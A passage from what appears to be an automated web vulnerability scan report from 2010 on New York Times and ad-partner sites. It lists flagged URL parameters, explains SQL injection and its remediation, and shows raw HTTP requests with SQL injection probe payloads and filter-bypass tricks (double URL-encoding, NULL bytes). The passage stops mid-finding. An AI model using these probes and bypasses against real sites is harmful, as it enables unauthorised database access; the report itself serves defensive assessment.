3.183. http://opinionator.blogs.nytimes.com/category/dick-cavett/feed/ [REST URL parameter 3]
3.184. http://opinionator.blogs.nytimes.com/category/dick-cavett/page/2/ [REST URL parameter 3]
3.185. http://opinionator.blogs.nytimes.com/category/disunion [REST URL parameter 2]
3.186. http://opinionator.blogs.nytimes.com/category/disunion/ [REST URL parameter 2]
3.187. http://opinionator.blogs.nytimes.com/category/disunion/feed/ [REST URL parameter 3]
3.188. http://opinionator.blogs.nytimes.com/category/disunion/page/2/ [REST URL parameter 3]
3.189. http://opinionator.blogs.nytimes.com/category/errol-morris [REST URL parameter 2]
3.190. http://opinionator.blogs.nytimes.com/category/errol-morris/feed/ [REST URL parameter 3]
3.191. http://opinionator.blogs.nytimes.com/category/errol-morris/page/2/ [REST URL parameter 3]
3.192. http://opinionator.blogs.nytimes.com/category/fixes [REST URL parameter 2]
3.193. http://opinionator.blogs.nytimes.com/category/fixes/ [REST URL parameter 2]
3.194. http://opinionator.blogs.nytimes.com/category/fixes/feed/ [REST URL parameter 3]
3.195. http://opinionator.blogs.nytimes.com/category/fixes/page/2/ [REST URL parameter 3]
3.196. http://opinionator.blogs.nytimes.com/category/home-fires [REST URL parameter 2]
3.197. http://opinionator.blogs.nytimes.com/category/home-fires/ [REST URL parameter 2]
3.198. http://opinionator.blogs.nytimes.com/category/home-fires/feed/ [REST URL parameter 3]
3.199. http://opinionator.blogs.nytimes.com/category/home-fires/page/2/ [REST URL parameter 3]
3.200. http://opinionator.blogs.nytimes.com/category/linda-greenhouse [REST URL parameter 2]
3.201. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/ [REST URL parameter 2]
3.202. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/feed/ [REST URL parameter 3]
3.203. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/page/2/ [REST URL parameter 3]
3.204. http://opinionator.blogs.nytimes.com/category/line-by-line [REST URL parameter 2]
3.205. http://opinionator.blogs.nytimes.com/category/line-by-line/ [REST URL parameter 2]
3.206. http://opinionator.blogs.nytimes.com/category/line-by-line/feed/ [REST URL parameter 3]
3.207. http://opinionator.blogs.nytimes.com/category/line-by-line/page/2/ [REST URL parameter 3]
3.208. http://opinionator.blogs.nytimes.com/category/living-rooms [REST URL parameter 2]
3.209. http://opinionator.blogs.nytimes.com/category/living-rooms/feed/ [REST URL parameter 3]
3.210. http://opinionator.blogs.nytimes.com/category/living-rooms/page/2/ [REST URL parameter 3]
3.211. http://opinionator.blogs.nytimes.com/category/peter-orszag [REST URL parameter 2]
3.212. http://opinionator.blogs.nytimes.com/category/peter-orszag/ [REST URL parameter 2]
3.213. http://opinionator.blogs.nytimes.com/category/peter-orszag/feed/ [REST URL parameter 3]
3.214. http://opinionator.blogs.nytimes.com/category/peter-orszag/page/2/ [REST URL parameter 3]
3.215. http://opinionator.blogs.nytimes.com/category/robert-wright [REST URL parameter 2]
3.216. http://opinionator.blogs.nytimes.com/category/robert-wright/ [REST URL parameter 2]
3.217. http://opinionator.blogs.nytimes.com/category/robert-wright/feed/ [REST URL parameter 3]
3.218. http://opinionator.blogs.nytimes.com/category/robert-wright/page/2/ [REST URL parameter 3]
3.219. http://opinionator.blogs.nytimes.com/category/stanley-fish [REST URL parameter 2]
3.220. http://opinionator.blogs.nytimes.com/category/stanley-fish/ [REST URL parameter 2]
3.221. http://opinionator.blogs.nytimes.com/category/stanley-fish/feed/ [REST URL parameter 3]
3.222. http://opinionator.blogs.nytimes.com/category/stanley-fish/page/2/ [REST URL parameter 3]
3.223. http://opinionator.blogs.nytimes.com/category/the-conversation [REST URL parameter 2]
3.224. http://opinionator.blogs.nytimes.com/category/the-conversation/ [REST URL parameter 2]
3.225. http://opinionator.blogs.nytimes.com/category/the-conversation/feed/ [REST URL parameter 3]
3.226. http://opinionator.blogs.nytimes.com/category/the-conversation/page/2/ [REST URL parameter 3]
3.227. http://opinionator.blogs.nytimes.com/category/the-score [REST URL parameter 2]
3.228. http://opinionator.blogs.nytimes.com/category/the-score/feed/ [REST URL parameter 3]
3.229. http://opinionator.blogs.nytimes.com/category/the-score/page/2/ [REST URL parameter 3]
3.230. http://opinionator.blogs.nytimes.com/category/the-stone [REST URL parameter 2]
3.231. http://opinionator.blogs.nytimes.com/category/the-stone/ [REST URL parameter 2]
3.232. http://opinionator.blogs.nytimes.com/category/the-stone/feed/ [REST URL parameter 3]
3.233. http://opinionator.blogs.nytimes.com/category/the-stone/page/2/ [REST URL parameter 3]
3.234. http://opinionator.blogs.nytimes.com/category/the-thread [REST URL parameter 2]
3.235. http://opinionator.blogs.nytimes.com/category/the-thread/ [REST URL parameter 2]
3.236. http://opinionator.blogs.nytimes.com/category/the-thread/feed/ [REST URL parameter 3]
3.237. http://opinionator.blogs.nytimes.com/category/the-thread/page/2/ [REST URL parameter 3]
3.238. http://opinionator.blogs.nytimes.com/category/timothy-egan [REST URL parameter 2]
3.239. http://opinionator.blogs.nytimes.com/category/timothy-egan/ [REST URL parameter 2]
3.240. http://opinionator.blogs.nytimes.com/category/timothy-egan/feed/ [REST URL parameter 3]
3.241. http://opinionator.blogs.nytimes.com/category/timothy-egan/page/2/ [REST URL parameter 3]
3.242. http://opinionator.blogs.nytimes.com/category/townie [REST URL parameter 2]
3.243. http://opinionator.blogs.nytimes.com/category/townie/page/2/ [REST URL parameter 3]
3.244. http://opinionator.blogs.nytimes.com/category/townies/ [REST URL parameter 2]
3.245. http://opinionator.blogs.nytimes.com/category/townies/feed [REST URL parameter 3]
3.246. http://opinionator.blogs.nytimes.com/category/william-d-cohan [REST URL parameter 2]
3.247. http://opinionator.blogs.nytimes.com/category/william-d-cohan/ [REST URL parameter 2]
3.248. http://opinionator.blogs.nytimes.com/category/william-d-cohan/feed/ [REST URL parameter 3]
3.249. http://opinionator.blogs.nytimes.com/category/william-d-cohan/page/2/ [REST URL parameter 3]
3.250. http://opinionator.blogs.nytimes.com/tag/alan-simpson/ [REST URL parameter 2]
3.251. http://opinionator.blogs.nytimes.com/tag/budget/ [REST URL parameter 2]
3.252. http://opinionator.blogs.nytimes.com/tag/erskine-bowles/ [REST URL parameter 2]
3.253. http://opinionator.blogs.nytimes.com/tag/federal-deficit/ [REST URL parameter 2]
3.254. http://opinionator.blogs.nytimes.com/tag/health-care-reform/ [REST URL parameter 2]
3.255. http://opinionator.blogs.nytimes.com/tag/social-security/ [REST URL parameter 2]
3.256. http://opinionator.blogs.nytimes.com/tag/taxes/ [REST URL parameter 2]
3.257. https://placead.nytimes.com/default.asp [CategoryID parameter]
3.258. http://prescriptions.blogs.nytimes.com/2010/11/12/group-says-camel-packs-lure-the-young/ [src parameter]
3.259. http://scientistatwork.blogs.nytimes.com/2010/11/12/drought-in-the-amazon-up-close-and-personal/ [src parameter]
3.260. http://scientistatwork.blogs.nytimes.com/2010/11/12/in-the-remote-pacific-glimpses-of-pristine-corals/ [src parameter]
3.261. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 1]
3.262. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 1]
3.263. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]
3.264. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]
3.265. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]
3.266. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 3]
3.267. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 3]
3.268. http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html [name of an arbitrarily supplied request parameter]
3.269. http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html [ref parameter]
3.270. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [hpw parameter]
3.271. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [name of an arbitrarily supplied request parameter]
3.272. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [ref parameter]
3.273. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [src parameter]
3.274. http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html [name of an arbitrarily supplied request parameter]
3.275. http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html [ref parameter]
3.276. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [hpw parameter]
3.277. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [name of an arbitrarily supplied request parameter]
3.278. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [ref parameter]
3.279. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [hpw parameter]
3.280. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [name of an arbitrarily supplied request parameter]
3.281. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [src parameter]
3.282. http://thecaucus.blogs.nytimes.com/2010/11/12/gov-perry-to-lead-republican-governors/ [src parameter]
3.283. http://thequad.blogs.nytimes.com/2010/11/12/quad-qa-sienas-ryan-rossiter/ [src parameter]
3.284. http://thequad.blogs.nytimes.com/2010/11/12/weekly-pick-em-crunch-time-in-the-sec/ [src parameter]
3.285. http://tmagazine.blogs.nytimes.com/2010/11/12/look-of-the-moment-v-b-s-tangerine-dream/ [src parameter]
3.286. http://topics.blogs.nytimes.com/tag/after-deadline/ [REST URL parameter 2]
3.287. http://topics.blogs.nytimes.com/tag/bees/ [REST URL parameter 2]
3.288. http://topics.blogs.nytimes.com/tag/coffee/ [REST URL parameter 2]
3.289. http://topics.blogs.nytimes.com/tag/composting/ [REST URL parameter 2]
3.290. http://trc.taboolasyndication.com/dispatch [item-type parameter]
3.291. http://trc.taboolasyndication.com/dispatch [list-id parameter]
3.292. http://trc.taboolasyndication.com/dispatch [publisher parameter]
3.293. http://us.blackberry.com/smartphones/blackberrytorch.jsp [REST URL parameter 2]
3.294. http://video.nytimes.com/ [name of an arbitrarily supplied request parameter]
3.295. http://video.nytimes.com/ [src parameter]
3.296. http://video.nytimes.com/video/2010/10/15/dining/1248068993504/quick-preserved-lemons.html [name of an arbitrarily supplied request parameter]
3.297. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 2]
3.298. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 3]
3.299. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 4]
3.300. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]
3.301. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]
3.302. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]
3.303. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [name of an arbitrarily supplied request parameter]
3.304. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 2]
3.305. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 3]
3.306. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 4]
3.307. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]
3.308. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]
3.309. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]
3.310. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [name of an arbitrarily supplied request parameter]
3.311. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [REST URL parameter 2]
3.312. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [REST URL parameter 3]
3.313. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [name of an arbitrarily supplied request parameter]
3.314. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 2]
3.315. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 3]
3.316. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 4]
3.317. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]
3.318. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]
3.319. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]
3.320. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]
3.321. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]
3.322. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]
3.323. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [name of an arbitrarily supplied request parameter]
3.324. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 2]
3.325. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 3]
3.326. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 4]
3.327. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]
3.328. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]
3.329. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]
3.330. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [name of an arbitrarily supplied request parameter]
3.331. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 2]
3.332. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 3]
3.333. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 4]
3.334. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]
3.335. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]
3.336. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]
3.337. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 6]
3.338. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 7]
3.339. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [name of an arbitrarily supplied request parameter]
3.340. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 2]
3.341. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 3]
3.342. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 4]
3.343. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [name of an arbitrarily supplied request parameter]
3.344. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 2]
3.345. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 3]
3.346. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 4]
3.347. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]
3.348. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]
3.349. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]
3.350. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 6]
3.351. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 7]
3.352. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [name of an arbitrarily supplied request parameter]
3.353. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 2]
3.354. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 3]
3.355. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 4]
3.356. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [name of an arbitrarily supplied request parameter]
3.357. http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html [REST URL parameter 2]
3.358. http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html [name of an arbitrarily supplied request parameter]
3.359. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 2]
3.360. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 3]
3.361. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 4]
3.362. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]
3.363. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]
3.364. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]
3.365. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [name of an arbitrarily supplied request parameter]
3.366. http://video.nytimes.com/video/2010/11/09/business/1248069304600/fed-move-not-enough.html [name of an arbitrarily supplied request parameter]
3.367. http://video.nytimes.com/video/2010/11/11/dining/1248069312941/tipsy-diaries-beans-with-booze.html [name of an arbitrarily supplied request parameter]
3.368. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 2]
3.369. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 3]
3.370. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 4]
3.371. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [name of an arbitrarily supplied request parameter]
3.372. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 2]
3.373. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 3]
3.374. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 4]
3.375. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [name of an arbitrarily supplied request parameter]
3.376. http://video.nytimes.com/video/2010/11/12/multimedia/1248069223837/bayous-quagmire-for-goldman.html [name of an arbitrarily supplied request parameter]
3.377. http://video.nytimes.com/video/2010/11/12/world/1248069321921/timescast-november-12-2010.html [name of an arbitrarily supplied request parameter]
3.378. http://video.on.nytimes.com/ [name of an arbitrarily supplied request parameter]
3.379. http://homedelivery.nytimes.com/ [Referer HTTP header]
3.380. http://ipboutiquehotel.com/ [Referer HTTP header]
4. Open redirection
1. SQL injection
There are 6 instances of this issue:
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
- One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
- Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [ad parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5739.NYTimes.com/B4990972.8
Issue detail
The ad parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ad parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ad request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt%2527&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response 1
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 03 16:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
Request 2
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt%2527%2527&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response 2
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 434
document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black ...[SNIP]...
1.2. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [camp parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5739.NYTimes.com/B4990972.8
Issue detail
The camp parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the camp parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2%00'&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response 1
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 03 16:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
Request 2
